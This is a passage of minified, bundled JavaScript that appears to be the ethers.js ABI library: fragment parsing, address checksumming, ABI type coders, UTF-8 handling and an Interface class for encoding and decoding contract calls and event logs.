                        "function" !== e.type && q.throwArgumentError("invalid function object", "value", e);
                        let t = oe(e);
                        const r = {
                            type: e.type,
                            name: he(e.name),
                            constant: t.constant,
                            inputs: e.inputs ? e.inputs.map($.fromObject) : [],
                            outputs: e.outputs ? e.outputs.map($.fromObject) : [],
                            payable: t.payable,
                            stateMutability: t.stateMutability,
                            gas: e.gas ? M.from(e.gas) : null
                        };
                        return new ae(z, r);
                    }
                    static fromString(e) {
                        let t = {
                            type: "function"
                        }, r = (e = ne(e, t)).split(" returns ");
                        r.length > 2 && q.throwArgumentError("invalid function string", "value", e);
                        let n = r[0].match(fe);
                        if (n || q.throwArgumentError("invalid function signature", "value", e), t.name = n[1].trim(), t.name && he(t.name), t.inputs = ee(n[2], !1), ie(n[3].trim(), t), r.length > 1) {
                            let n = r[1].match(fe);
                            "" == n[1].trim() && "" == n[3].trim() || q.throwArgumentError("unexpected tokens", "value", e), t.outputs = ee(n[2], !1);
                        } else t.outputs = [];
                        return ae.fromObject(t);
                    }
                    static isFunctionFragment(e) {
                        return e && e._isFragment && "function" === e.type;
                    }
                }
                function ue(e) {
                    const t = e.format();
                    return "Error(string)" !== t && "Panic(uint256)" !== t || q.throwArgumentError(`cannot specify user defined ${t} error`, "fragment", e), e;
                }
                class ce extends te {
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) return JSON.stringify({
                            type: "error",
                            name: this.name,
                            inputs: this.inputs.map((t)=>JSON.parse(t.format(e)))
                        });
                        let t = "";
                        return e !== Y.sighash && (t += "error "), t += this.name + "(" + this.inputs.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ") ", t.trim();
                    }
                    static from(e) {
                        return "string" == typeof e ? ce.fromString(e) : ce.fromObject(e);
                    }
                    static fromObject(e) {
                        if (ce.isErrorFragment(e)) return e;
                        "error" !== e.type && q.throwArgumentError("invalid error object", "value", e);
                        const t = {
                            type: e.type,
                            name: he(e.name),
                            inputs: e.inputs ? e.inputs.map($.fromObject) : []
                        };
                        return ue(new ce(z, t));
                    }
                    static fromString(e) {
                        let t = {
                            type: "error"
                        }, r = e.match(fe);
                        return r || q.throwArgumentError("invalid error signature", "value", e), t.name = r[1].trim(), t.name && he(t.name), t.inputs = ee(r[2], !1), ue(ce.fromObject(t));
                    }
                    static isErrorFragment(e) {
                        return e && e._isFragment && "error" === e.type;
                    }
                }
                function le(e) {
                    return e.match(/^uint($|[^1-9])/) ? e = "uint256" + e.substring(4) : e.match(/^int($|[^1-9])/) && (e = "int256" + e.substring(3)), e;
                }
                const de = new RegExp("^[a-zA-Z$_][a-zA-Z0-9$_]*$");
                function he(e) {
                    return e && e.match(de) || q.throwArgumentError(`invalid identifier "${e}"`, "value", e), e;
                }
                const fe = new RegExp("^([^)(]*)\\((.*)\\)([^)(]*)$"), pe = new p(W);
                function me(e) {
                    const t = [], r = function(e, n) {
                        if (Array.isArray(n)) for(let i in n){
                            const o = e.slice();
                            o.push(i);
                            try {
                                r(o, n[i]);
                            } catch (e) {
                                t.push({
                                    path: o,
                                    error: e
                                });
                            }
                        }
                    };
                    return r([], e), t;
                }
                class ge {
                    constructor(e, t, r, n){
                        this.name = e, this.type = t, this.localName = r, this.dynamic = n;
                    }
                    _throwError(e, t) {
                        pe.throwArgumentError(e, this.localName, t);
                    }
                }
                class ye {
                    constructor(e){
                        F(this, "wordSize", e || 32), this._data = [], this._dataLength = 0, this._padding = new Uint8Array(e);
                    }
                    get data() {
                        return function(e) {
                            let t = "0x";
                            return e.forEach((e)=>{
                                t += T(e).substring(2);
                            }), t;
                        }(this._data);
                    }
                    get length() {
                        return this._dataLength;
                    }
                    _writeData(e) {
                        return this._data.push(e), this._dataLength += e.length, e.length;
                    }
                    appendWriter(e) {
                        return this._writeData(A(e._data));
                    }
                    writeBytes(e) {
                        let t = E(e);
                        const r = t.length % this.wordSize;
                        return r && (t = A([
                            t,
                            this._padding.slice(r)
                        ])), this._writeData(t);
                    }
                    _getValue(e) {
                        let t = E(M.from(e));
                        return t.length > this.wordSize && pe.throwError("value out-of-bounds", p.errors.BUFFER_OVERRUN, {
                            length: this.wordSize,
                            offset: t.length
                        }), t.length % this.wordSize && (t = A([
                            this._padding.slice(t.length % this.wordSize),
                            t
                        ])), t;
                    }
                    writeValue(e) {
                        return this._writeData(this._getValue(e));
                    }
                    writeUpdatableValue() {
                        const e = this._data.length;
                        return this._data.push(this._padding), this._dataLength += this.wordSize, (t)=>{
                            this._data[e] = this._getValue(t);
                        };
                    }
                }
                class ve {
                    constructor(e, t, r, n){
                        F(this, "_data", E(e)), F(this, "wordSize", t || 32), F(this, "_coerceFunc", r), F(this, "allowLoose", n), this._offset = 0;
                    }
                    get data() {
                        return T(this._data);
                    }
                    get consumed() {
                        return this._offset;
                    }
                    static coerce(e, t) {
                        let r = e.match("^u?int([0-9]+)$");
                        return r && parseInt(r[1]) <= 48 && (t = t.toNumber()), t;
                    }
                    coerce(e, t) {
                        return this._coerceFunc ? this._coerceFunc(e, t) : ve.coerce(e, t);
                    }
                    _peekBytes(e, t, r) {
                        let n = Math.ceil(t / this.wordSize) * this.wordSize;
                        return this._offset + n > this._data.length && (this.allowLoose && r && this._offset + t <= this._data.length ? n = t : pe.throwError("data out-of-bounds", p.errors.BUFFER_OVERRUN, {
                            length: this._data.length,
                            offset: this._offset + n
                        })), this._data.slice(this._offset, this._offset + n);
                    }
                    subReader(e) {
                        return new ve(this._data.slice(this._offset + e), this.wordSize, this._coerceFunc, this.allowLoose);
                    }
                    readBytes(e, t) {
                        let r = this._peekBytes(0, e, !!t);
                        return this._offset += r.length, r.slice(0, e);
                    }
                    readValue() {
                        return M.from(this.readBytes(this.wordSize));
                    }
                }
                var be = r(3669), Ee = r.n(be);
                function Ae(e) {
                    return "0x" + Ee().keccak_256(E(e));
                }
                const _e = new p("address/5.7.0");
                function we(e) {
                    _(e, 20) || _e.throwArgumentError("invalid address", "address", e);
                    const t = (e = e.toLowerCase()).substring(2).split(""), r = new Uint8Array(40);
                    for(let e = 0; e < 40; e++)r[e] = t[e].charCodeAt(0);
                    const n = E(Ae(r));
                    for(let e = 0; e < 40; e += 2)n[e >> 1] >> 4 >= 8 && (t[e] = t[e].toUpperCase()), (15 & n[e >> 1]) >= 8 && (t[e + 1] = t[e + 1].toUpperCase());
                    return "0x" + t.join("");
                }
                const Te = {};
                for(let e = 0; e < 10; e++)Te[String(e)] = String(e);
                for(let e = 0; e < 26; e++)Te[String.fromCharCode(65 + e)] = String(10 + e);
                const Re = Math.floor((Ie = 9007199254740991, Math.log10 ? Math.log10(Ie) : Math.log(Ie) / Math.LN10));
                var Ie;
                function Se(e) {
                    let t = null;
                    if ("string" != typeof e && _e.throwArgumentError("invalid address", "address", e), e.match(/^(0x)?[0-9a-fA-F]{40}$/)) "0x" !== e.substring(0, 2) && (e = "0x" + e), t = we(e), e.match(/([A-F].*[a-f])|([a-f].*[A-F])/) && t !== e && _e.throwArgumentError("bad address checksum", "address", e);
                    else if (e.match(/^XE[0-9]{2}[0-9A-Za-z]{30,31}$/)) {
                        for(e.substring(2, 4) !== function(e) {
                            let t = (e = (e = e.toUpperCase()).substring(4) + e.substring(0, 2) + "00").split("").map((e)=>Te[e]).join("");
                            for(; t.length >= Re;){
                                let e = t.substring(0, Re);
                                t = parseInt(e, 10) % 97 + t.substring(e.length);
                            }
                            let r = String(98 - parseInt(t, 10) % 97);
                            for(; r.length < 2;)r = "0" + r;
                            return r;
                        }(e) && _e.throwArgumentError("bad icap checksum", "address", e), r = e.substring(4), t = new I(r, 36).toString(16); t.length < 40;)t = "0" + t;
                        t = we("0x" + t);
                    } else _e.throwArgumentError("invalid address", "address", e);
                    var r;
                    return t;
                }
                class Pe extends ge {
                    constructor(e){
                        super("address", "address", e, !1);
                    }
                    defaultValue() {
                        return "0x0000000000000000000000000000000000000000";
                    }
                    encode(e, t) {
                        try {
                            t = Se(t);
                        } catch (e) {
                            this._throwError(e.message, t);
                        }
                        return e.writeValue(t);
                    }
                    decode(e) {
                        return Se(R(e.readValue().toHexString(), 20));
                    }
                }
                class Oe extends ge {
                    constructor(e){
                        super(e.name, e.type, void 0, e.dynamic), this.coder = e;
                    }
                    defaultValue() {
                        return this.coder.defaultValue();
                    }
                    encode(e, t) {
                        return this.coder.encode(e, t);
                    }
                    decode(e) {
                        return this.coder.decode(e);
                    }
                }
                const xe = new p(W);
                function Me(e, t, r) {
                    let n = null;
                    if (Array.isArray(r)) n = r;
                    else if (r && "object" == typeof r) {
                        let e = {};
                        n = t.map((t)=>{
                            const n = t.localName;
                            return n || xe.throwError("cannot encode object for signature with missing names", p.errors.INVALID_ARGUMENT, {
                                argument: "values",
                                coder: t,
                                value: r
                            }), e[n] && xe.throwError("cannot encode object for signature with duplicate names", p.errors.INVALID_ARGUMENT, {
                                argument: "values",
                                coder: t,
                                value: r
                            }), e[n] = !0, r[n];
                        });
                    } else xe.throwArgumentError("invalid tuple value", "tuple", r);
                    t.length !== n.length && xe.throwArgumentError("types/value length mismatch", "tuple", r);
                    let i = new ye(e.wordSize), o = new ye(e.wordSize), s = [];
                    t.forEach((e, t)=>{
                        let r = n[t];
                        if (e.dynamic) {
                            let t = o.length;
                            e.encode(o, r);
                            let n = i.writeUpdatableValue();
                            s.push((e)=>{
                                n(e + t);
                            });
                        } else e.encode(i, r);
                    }), s.forEach((e)=>{
                        e(i.length);
                    });
                    let a = e.appendWriter(i);
                    return a += e.appendWriter(o), a;
                }
                function Be(e, t) {
                    let r = [], n = e.subReader(0);
                    t.forEach((t)=>{
                        let i = null;
                        if (t.dynamic) {
                            let r = e.readValue(), o = n.subReader(r.toNumber());
                            try {
                                i = t.decode(o);
                            } catch (e) {
                                if (e.code === p.errors.BUFFER_OVERRUN) throw e;
                                i = e, i.baseType = t.name, i.name = t.localName, i.type = t.type;
                            }
                        } else try {
                            i = t.decode(e);
                        } catch (e) {
                            if (e.code === p.errors.BUFFER_OVERRUN) throw e;
                            i = e, i.baseType = t.name, i.name = t.localName, i.type = t.type;
                        }
                        null != i && r.push(i);
                    });
                    const i = t.reduce((e, t)=>{
                        const r = t.localName;
                        return r && (e[r] || (e[r] = 0), e[r]++), e;
                    }, {});
                    t.forEach((e, t)=>{
                        let n = e.localName;
                        if (!n || 1 !== i[n]) return;
                        if ("length" === n && (n = "_length"), null != r[n]) return;
                        const o = r[t];
                        o instanceof Error ? Object.defineProperty(r, n, {
                            enumerable: !0,
                            get: ()=>{
                                throw o;
                            }
                        }) : r[n] = o;
                    });
                    for(let e = 0; e < r.length; e++){
                        const t = r[e];
                        t instanceof Error && Object.defineProperty(r, e, {
                            enumerable: !0,
                            get: ()=>{
                                throw t;
                            }
                        });
                    }
                    return Object.freeze(r);
                }
                class Ne extends ge {
                    constructor(e, t, r){
                        super("array", e.type + "[" + (t >= 0 ? t : "") + "]", r, -1 === t || e.dynamic), this.coder = e, this.length = t;
                    }
                    defaultValue() {
                        const e = this.coder.defaultValue(), t = [];
                        for(let r = 0; r < this.length; r++)t.push(e);
                        return t;
                    }
                    encode(e, t) {
                        Array.isArray(t) || this._throwError("expected array value", t);
                        let r = this.length;
                        -1 === r && (r = t.length, e.writeValue(t.length)), xe.checkArgumentCount(t.length, r, "coder array" + (this.localName ? " " + this.localName : ""));
                        let n = [];
                        for(let e = 0; e < t.length; e++)n.push(this.coder);
                        return Me(e, n, t);
                    }
                    decode(e) {
                        let t = this.length;
                        -1 === t && (t = e.readValue().toNumber(), 32 * t > e._data.length && xe.throwError("insufficient data length", p.errors.BUFFER_OVERRUN, {
                            length: e._data.length,
                            count: t
                        }));
                        let r = [];
                        for(let e = 0; e < t; e++)r.push(new Oe(this.coder));
                        return e.coerce(this.name, Be(e, r));
                    }
                }
                class Ce extends ge {
                    constructor(e){
                        super("bool", "bool", e, !1);
                    }
                    defaultValue() {
                        return !1;
                    }
                    encode(e, t) {
                        return e.writeValue(t ? 1 : 0);
                    }
                    decode(e) {
                        return e.coerce(this.type, !e.readValue().isZero());
                    }
                }
                class ke extends ge {
                    constructor(e, t){
                        super(e, e, t, !0);
                    }
                    defaultValue() {
                        return "0x";
                    }
                    encode(e, t) {
                        t = E(t);
                        let r = e.writeValue(t.length);
                        return r += e.writeBytes(t), r;
                    }
                    decode(e) {
                        return e.readBytes(e.readValue().toNumber(), !0);
                    }
                }
                class Le extends ke {
                    constructor(e){
                        super("bytes", e);
                    }
                    decode(e) {
                        return e.coerce(this.name, T(super.decode(e)));
                    }
                }
                class Fe extends ge {
                    constructor(e, t){
                        let r = "bytes" + String(e);
                        super(r, r, t, !1), this.size = e;
                    }
                    defaultValue() {
                        return "0x0000000000000000000000000000000000000000000000000000000000000000".substring(0, 2 + 2 * this.size);
                    }
                    encode(e, t) {
                        let r = E(t);
                        return r.length !== this.size && this._throwError("incorrect data length", t), e.writeBytes(r);
                    }
                    decode(e) {
                        return e.coerce(this.name, T(e.readBytes(this.size)));
                    }
                }
                class De extends ge {
                    constructor(e){
                        super("null", "", e, !1);
                    }
                    defaultValue() {
                        return null;
                    }
                    encode(e, t) {
                        return null != t && this._throwError("not null", t), e.writeBytes([]);
                    }
                    decode(e) {
                        return e.readBytes(0), e.coerce(this.name, null);
                    }
                }
                const je = M.from(-1), Ue = M.from(0), He = M.from(1), Ge = M.from("0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff");
                class Ve extends ge {
                    constructor(e, t, r){
                        const n = (t ? "int" : "uint") + 8 * e;
                        super(n, n, r, !1), this.size = e, this.signed = t;
                    }
                    defaultValue() {
                        return 0;
                    }
                    encode(e, t) {
                        let r = M.from(t), n = Ge.mask(8 * e.wordSize);
                        if (this.signed) {
                            let e = n.mask(8 * this.size - 1);
                            (r.gt(e) || r.lt(e.add(He).mul(je))) && this._throwError("value out-of-bounds", t);
                        } else (r.lt(Ue) || r.gt(n.mask(8 * this.size))) && this._throwError("value out-of-bounds", t);
                        return r = r.toTwos(8 * this.size).mask(8 * this.size), this.signed && (r = r.fromTwos(8 * this.size).toTwos(8 * e.wordSize)), e.writeValue(r);
                    }
                    decode(e) {
                        let t = e.readValue().mask(8 * this.size);
                        return this.signed && (t = t.fromTwos(8 * this.size)), e.coerce(this.name, t);
                    }
                }
                const We = new p("strings/5.7.0");
                var qe, ze;
                function Qe(e, t, r, n, i) {
                    if (e === ze.BAD_PREFIX || e === ze.UNEXPECTED_CONTINUE) {
                        let e = 0;
                        for(let n = t + 1; n < r.length && r[n] >> 6 == 2; n++)e++;
                        return e;
                    }
                    return e === ze.OVERRUN ? r.length - t - 1 : 0;
                }
                !function(e) {
                    e.current = "", e.NFC = "NFC", e.NFD = "NFD", e.NFKC = "NFKC", e.NFKD = "NFKD";
                }(qe || (qe = {})), function(e) {
                    e.UNEXPECTED_CONTINUE = "unexpected continuation byte", e.BAD_PREFIX = "bad codepoint prefix", e.OVERRUN = "string overrun", e.MISSING_CONTINUE = "missing continuation byte", e.OUT_OF_RANGE = "out of UTF-8 range", e.UTF16_SURROGATE = "UTF-16 surrogate", e.OVERLONG = "overlong representation";
                }(ze || (ze = {}));
                const Ke = Object.freeze({
                    error: function(e, t, r, n, i) {
                        return We.throwArgumentError(`invalid codepoint at offset ${t}; ${e}`, "bytes", r);
                    },
                    ignore: Qe,
                    replace: function(e, t, r, n, i) {
                        return e === ze.OVERLONG ? (n.push(i), 0) : (n.push(65533), Qe(e, t, r));
                    }
                });
                function Je(e, t = qe.current) {
                    t != qe.current && (We.checkNormalize(), e = e.normalize(t));
                    let r = [];
                    for(let t = 0; t < e.length; t++){
                        const n = e.charCodeAt(t);
                        if (n < 128) r.push(n);
                        else if (n < 2048) r.push(n >> 6 | 192), r.push(63 & n | 128);
                        else if (55296 == (64512 & n)) {
                            t++;
                            const i = e.charCodeAt(t);
                            if (t >= e.length || 56320 != (64512 & i)) throw new Error("invalid utf-8 string");
                            const o = 65536 + ((1023 & n) << 10) + (1023 & i);
                            r.push(o >> 18 | 240), r.push(o >> 12 & 63 | 128), r.push(o >> 6 & 63 | 128), r.push(63 & o | 128);
                        } else r.push(n >> 12 | 224), r.push(n >> 6 & 63 | 128), r.push(63 & n | 128);
                    }
                    return E(r);
                }
                function Xe(e, t) {
                    return (function(e, t) {
                        null == t && (t = Ke.error), e = E(e);
                        const r = [];
                        let n = 0;
                        for(; n < e.length;){
                            const i = e[n++];
                            if (i >> 7 == 0) {
                                r.push(i);
                                continue;
                            }
                            let o = null, s = null;
                            if (192 == (224 & i)) o = 1, s = 127;
                            else if (224 == (240 & i)) o = 2, s = 2047;
                            else {
                                if (240 != (248 & i)) {
                                    n += t(128 == (192 & i) ? ze.UNEXPECTED_CONTINUE : ze.BAD_PREFIX, n - 1, e, r);
                                    continue;
                                }
                                o = 3, s = 65535;
                            }
                            if (n - 1 + o >= e.length) {
                                n += t(ze.OVERRUN, n - 1, e, r);
                                continue;
                            }
                            let a = i & (1 << 8 - o - 1) - 1;
                            for(let i = 0; i < o; i++){
                                let i = e[n];
                                if (128 != (192 & i)) {
                                    n += t(ze.MISSING_CONTINUE, n, e, r), a = null;
                                    break;
                                }
                                a = a << 6 | 63 & i, n++;
                            }
                            null !== a && (a > 1114111 ? n += t(ze.OUT_OF_RANGE, n - 1 - o, e, r, a) : a >= 55296 && a <= 57343 ? n += t(ze.UTF16_SURROGATE, n - 1 - o, e, r, a) : a <= s ? n += t(ze.OVERLONG, n - 1 - o, e, r, a) : r.push(a));
                        }
                        return r;
                    })(e, t).map((e)=>e <= 65535 ? String.fromCharCode(e) : (e -= 65536, String.fromCharCode(55296 + (e >> 10 & 1023), 56320 + (1023 & e)))).join("");
                }
                class Ye extends ke {
                    constructor(e){
                        super("string", e);
                    }
                    defaultValue() {
                        return "";
                    }
                    encode(e, t) {
                        return super.encode(e, Je(t));
                    }
                    decode(e) {
                        return Xe(super.decode(e));
                    }
                }
                class Ze extends ge {
                    constructor(e, t){
                        let r = !1;
                        const n = [];
                        e.forEach((e)=>{
                            e.dynamic && (r = !0), n.push(e.type);
                        }), super("tuple", "tuple(" + n.join(",") + ")", t, r), this.coders = e;
                    }
                    defaultValue() {
                        const e = [];
                        this.coders.forEach((t)=>{
                            e.push(t.defaultValue());
                        });
                        const t = this.coders.reduce((e, t)=>{
                            const r = t.localName;
                            return r && (e[r] || (e[r] = 0), e[r]++), e;
                        }, {});
                        return this.coders.forEach((r, n)=>{
                            let i = r.localName;
                            i && 1 === t[i] && ("length" === i && (i = "_length"), null == e[i] && (e[i] = e[n]));
                        }), Object.freeze(e);
                    }
                    encode(e, t) {
                        return Me(e, this.coders, t);
                    }
                    decode(e) {
                        return e.coerce(this.name, Be(e, this.coders));
                    }
                }
                const $e = new p(W), et = new RegExp(/^bytes([0-9]*)$/), tt = new RegExp(/^(u?int)([0-9]*)$/);
                class rt {
                    constructor(e){
                        F(this, "coerceFunc", e || null);
                    }
                    _getCoder(e) {
                        switch(e.baseType){
                            case "address":
                                return new Pe(e.name);
                            case "bool":
                                return new Ce(e.name);
                            case "string":
                                return new Ye(e.name);
                            case "bytes":
                                return new Le(e.name);
                            case "array":
                                return new Ne(this._getCoder(e.arrayChildren), e.arrayLength, e.name);
                            case "tuple":
                                return new Ze((e.components || []).map((e)=>this._getCoder(e)), e.name);
                            case "":
                                return new De(e.name);
                        }
                        let t = e.type.match(tt);
                        if (t) {
                            let r = parseInt(t[2] || "256");
                            return (0 === r || r > 256 || r % 8 != 0) && $e.throwArgumentError("invalid " + t[1] + " bit length", "param", e), new Ve(r / 8, "int" === t[1], e.name);
                        }
                        if (t = e.type.match(et), t) {
                            let r = parseInt(t[1]);
                            return (0 === r || r > 32) && $e.throwArgumentError("invalid bytes length", "param", e), new Fe(r, e.name);
                        }
                        return $e.throwArgumentError("invalid type", "type", e.type);
                    }
                    _getWordSize() {
                        return 32;
                    }
                    _getReader(e, t) {
                        return new ve(e, this._getWordSize(), this.coerceFunc, t);
                    }
                    _getWriter() {
                        return new ye(this._getWordSize());
                    }
                    getDefaultValue(e) {
                        const t = e.map((e)=>this._getCoder($.from(e)));
                        return new Ze(t, "_").defaultValue();
                    }
                    encode(e, t) {
                        e.length !== t.length && $e.throwError("types/values length mismatch", p.errors.INVALID_ARGUMENT, {
                            count: {
                                types: e.length,
                                values: t.length
                            },
                            value: {
                                types: e,
                                values: t
                            }
                        });
                        const r = e.map((e)=>this._getCoder($.from(e))), n = new Ze(r, "_"), i = this._getWriter();
                        return n.encode(i, t), i.data;
                    }
                    decode(e, t, r) {
                        const n = e.map((e)=>this._getCoder($.from(e)));
                        return new Ze(n, "_").decode(this._getReader(E(t), r));
                    }
                }
                const nt = new rt;
                function it(e) {
                    return Ae(Je(e));
                }
                const ot = new p(W);
                class st extends V {
                }
                class at extends V {
                }
                class ut extends V {
                }
                class ct extends V {
                    static isIndexed(e) {
                        return !(!e || !e._isIndexed);
                    }
                }
                const lt = {
                    "0x08c379a0": {
                        signature: "Error(string)",
                        name: "Error",
                        inputs: [
                            "string"
                        ],
                        reason: !0
                    },
                    "0x4e487b71": {
                        signature: "Panic(uint256)",
                        name: "Panic",
                        inputs: [
                            "uint256"
                        ]
                    }
                };
                function dt(e, t) {
                    const r = new Error(`deferred error during ABI decoding triggered accessing ${e}`);
                    return r.error = t, r;
                }
                class ht {
                    constructor(e){
                        let t = [];
                        t = "string" == typeof e ? JSON.parse(e) : e, F(this, "fragments", t.map((e)=>te.from(e)).filter((e)=>null != e)), F(this, "_abiCoder", D(new.target, "getAbiCoder")()), F(this, "functions", {}), F(this, "errors", {}), F(this, "events", {}), F(this, "structs", {}), this.fragments.forEach((e)=>{
                            let t = null;
                            switch(e.type){
                                case "constructor":
                                    return this.deploy ? void ot.warn("duplicate definition - constructor") : void F(this, "deploy", e);
                                case "function":
                                    t = this.functions;
                                    break;
                                case "event":
                                    t = this.events;
                                    break;
                                case "error":
                                    t = this.errors;
                                    break;
                                default:
                                    return;
                            }
                            let r = e.format();
                            t[r] ? ot.warn("duplicate definition - " + r) : t[r] = e;
                        }), this.deploy || F(this, "deploy", se.from({
                            payable: !1,
                            type: "constructor"
                        })), F(this, "_isInterface", !0);
                    }
                    format(e) {
                        e || (e = Y.full), e === Y.sighash && ot.throwArgumentError("interface does not support formatting sighash", "format", e);
                        const t = this.fragments.map((t)=>t.format(e));
                        return e === Y.json ? JSON.stringify(t.map((e)=>JSON.parse(e))) : t;
                    }
                    static getAbiCoder() {
                        return nt;
                    }
                    static getAddress(e) {
                        return Se(e);
                    }
                    static getSighash(e) {
                        var t, r;
                        return r = 0, "string" != typeof (t = it(e.format())) ? t = T(t) : (!_(t) || t.length % 2) && m.throwArgumentError("invalid hexData", "value", t), r = 2 + 2 * r, "0x" + t.substring(r, 10);
                    }
                    static getEventTopic(e) {
                        return it(e.format());
                    }
                    getFunction(e) {
                        if (_(e)) {
                            for(const t in this.functions)if (e === this.getSighash(t)) return this.functions[t];
                            ot.throwArgumentError("no matching function", "sighash", e);
                        }
                        if (-1 === e.indexOf("(")) {
                            const t = e.trim(), r = Object.keys(this.functions).filter((e)=>e.split("(")[0] === t);
                            return 0 === r.length ? ot.throwArgumentError("no matching function", "name", t) : r.length > 1 && ot.throwArgumentError("multiple matching functions", "name", t), this.functions[r[0]];
                        }
                        const t = this.functions[ae.fromString(e).format()];
                        return t || ot.throwArgumentError("no matching function", "signature", e), t;
                    }
                    getEvent(e) {
                        if (_(e)) {
                            const t = e.toLowerCase();
                            for(const e in this.events)if (t === this.getEventTopic(e)) return this.events[e];
                            ot.throwArgumentError("no matching event", "topichash", t);
                        }
                        if (-1 === e.indexOf("(")) {
                            const t = e.trim(), r = Object.keys(this.events).filter((e)=>e.split("(")[0] === t);
                            return 0 === r.length ? ot.throwArgumentError("no matching event", "name", t) : r.length > 1 && ot.throwArgumentError("multiple matching events", "name", t), this.events[r[0]];
                        }
                        const t = this.events[re.fromString(e).format()];
                        return t || ot.throwArgumentError("no matching event", "signature", e), t;
                    }
                    getError(e) {
                        if (_(e)) {
                            const t = D(this.constructor, "getSighash");
                            for(const r in this.errors)if (e === t(this.errors[r])) return this.errors[r];
                            ot.throwArgumentError("no matching error", "sighash", e);
                        }
                        if (-1 === e.indexOf("(")) {
                            const t = e.trim(), r = Object.keys(this.errors).filter((e)=>e.split("(")[0] === t);
                            return 0 === r.length ? ot.throwArgumentError("no matching error", "name", t) : r.length > 1 && ot.throwArgumentError("multiple matching errors", "name", t), this.errors[r[0]];
                        }
                        const t = this.errors[ae.fromString(e).format()];
                        return t || ot.throwArgumentError("no matching error", "signature", e), t;
                    }
                    getSighash(e) {
                        if ("string" == typeof e) try {
                            e = this.getFunction(e);
                        } catch (t) {
                            try {
                                e = this.getError(e);
                            } catch (e) {
                                throw t;
                            }
                        }
                        return D(this.constructor, "getSighash")(e);
                    }
                    getEventTopic(e) {
                        return "string" == typeof e && (e = this.getEvent(e)), D(this.constructor, "getEventTopic")(e);
                    }
                    _decodeParams(e, t) {
                        return this._abiCoder.decode(e, t);
                    }
                    _encodeParams(e, t) {
                        return this._abiCoder.encode(e, t);
                    }
                    encodeDeploy(e) {
                        return this._encodeParams(this.deploy.inputs, e || []);
                    }
                    decodeErrorResult(e, t) {
                        "string" == typeof e && (e = this.getError(e));
                        const r = E(t);
                        return T(r.slice(0, 4)) !== this.getSighash(e) && ot.throwArgumentError(`data signature does not match error ${e.name}.`, "data", T(r)), this._decodeParams(e.inputs, r.slice(4));
                    }
                    encodeErrorResult(e, t) {
                        return "string" == typeof e && (e = this.getError(e)), T(A([
                            this.getSighash(e),
                            this._encodeParams(e.inputs, t || [])
                        ]));
                    }
                    decodeFunctionData(e, t) {
                        "string" == typeof e && (e = this.getFunction(e));
                        const r = E(t);
                        return T(r.slice(0, 4)) !== this.getSighash(e) && ot.throwArgumentError(`data signature does not match function ${e.name}.`, "data", T(r)), this._decodeParams(e.inputs, r.slice(4));
                    }
                    encodeFunctionData(e, t) {
                        return "string" == typeof e && (e = this.getFunction(e)), T(A([
                            this.getSighash(e),
                            this._encodeParams(e.inputs, t || [])
                        ]));
                    }
                    decodeFunctionResult(e, t) {
                        "string" == typeof e && (e = this.getFunction(e));
                        let r = E(t), n = null, i = "", o = null, s = null, a = null;
                        switch(r.length % this._abiCoder._getWordSize()){
                            case 0:
                                try {
                                    return this._abiCoder.decode(e.outputs, r);
                                } catch (e) {}
                                break;
                            case 4:
                                {
                                    const e = T(r.slice(0, 4)), t = lt[e];
                                    if (t) o = this._abiCoder.decode(t.inputs, r.slice(4)), s = t.name, a = t.signature, t.reason && (n = o[0]), "Error" === s ? i = `; VM Exception while processing transaction: reverted with reason string ${JSON.stringify(o[0])}` : "Panic" === s && (i = `; VM Exception while processing transaction: reverted with panic code ${o[0]}`);
                                    else try {
                                        const t = this.getError(e);
                                        o = this._abiCoder.decode(t.inputs, r.slice(4)), s = t.name, a = t.format();
                                    } catch (e) {}
                                    break;
                                }
                        }
                        return ot.throwError("call revert exception" + i, p.errors.CALL_EXCEPTION, {
                            method: e.format(),
                            data: T(t),
                            errorArgs: o,
                            errorName: s,
                            errorSignature: a,
                            reason: n
                        });
                    }
                    encodeFunctionResult(e, t) {
                        return "string" == typeof e && (e = this.getFunction(e)), T(this._abiCoder.encode(e.outputs, t || []));
                    }
                    encodeFilterTopics(e, t) {
                        "string" == typeof e && (e = this.getEvent(e)), t.length > e.inputs.length && ot.throwError("too many arguments for " + e.format(), p.errors.UNEXPECTED_ARGUMENT, {
                            argument: "values",
                            value: t
                        });
                        let r = [];
                        e.anonymous || r.push(this.getEventTopic(e));
                        const n = (e, t)=>"string" === e.type ? it(t) : "bytes" === e.type ? Ae(T(t)) : ("bool" === e.type && "boolean" == typeof t && (t = t ? "0x01" : "0x00"), e.type.match(/^u?int/) && (t = M.from(t).toHexString()), "address" === e.type && this._abiCoder.encode([
                                "address"
                            ], [
                                t
                            ]), R(T(t), 32));
                        for(t.forEach((t, i)=>{
                            let o = e.inputs[i];
                            o.indexed ? null == t ? r.push(null) : "array" === o.baseType || "tuple" === o.baseType ? ot.throwArgumentError("filtering with tuples or arrays not supported", "contract." + o.name, t) : Array.isArray(t) ? r.push(t.map((e)=>n(o, e))) : r.push(n(o, t)) : null != t && ot.throwArgumentError("cannot filter non-indexed parameters; must be null", "contract." + o.name, t);
                        }); r.length && null === r[r.length - 1];)r.pop();
                        return r;
                    }
                    encodeEventLog(e, t) {
                        "string" == typeof e && (e = this.getEvent(e));
                        const r = [], n = [], i = [];
                        return e.anonymous || r.push(this.getEventTopic(e)), t.length !== e.inputs.length && ot.throwArgumentError("event arguments/values mismatch", "values", t), e.inputs.forEach((e, o)=>{
                            const s = t[o];
                            if (e.indexed) {
                                if ("string" === e.type) r.push(it(s));
                                else if ("bytes" === e.type) r.push(Ae(s));
                                else {
                                    if ("tuple" === e.baseType || "array" === e.baseType) throw new Error("not implemented");
                                    r.push(this._abiCoder.encode([
                                        e.type
                                    ], [
                                        s
                                    ]));
                                }
                            } else n.push(e), i.push(s);
                        }), {
                            data: this._abiCoder.encode(n, i),
                            topics: r
                        };
                    }
                    decodeEventLog(e, t, r) {
                        if ("string" == typeof e && (e = this.getEvent(e)), null != r && !e.anonymous) {
                            let t = this.getEventTopic(e);
                            _(r[0], 32) && r[0].toLowerCase() === t || ot.throwError("fragment/topic mismatch", p.errors.INVALID_ARGUMENT, {
                                argument: "topics[0]",
                                expected: t,
                                value: r[0]
                            }), r = r.slice(1);
                        }
                        let n = [], i = [], o = [];
                        e.inputs.forEach((e, t)=>{
                            e.indexed ? "string" === e.type || "bytes" === e.type || "tuple" === e.baseType || "array" === e.baseType ? (n.push($.fromObject({
                                type: "bytes32",
                                name: e.name
